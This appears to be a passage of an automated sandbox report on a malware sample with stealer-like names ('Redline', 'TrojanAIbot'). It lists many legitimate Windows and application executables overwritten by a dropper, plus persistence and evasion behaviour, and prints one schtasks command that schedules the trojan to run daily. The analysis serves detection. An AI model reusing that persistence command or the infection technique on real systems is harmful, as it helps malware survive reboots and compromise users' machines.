                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\microsofts.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile created: C:\Users\user\AppData\Local\Temp\build.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,2_2_04DFCBD0

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Creates files inside the volume driver (system volume information)
                        Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
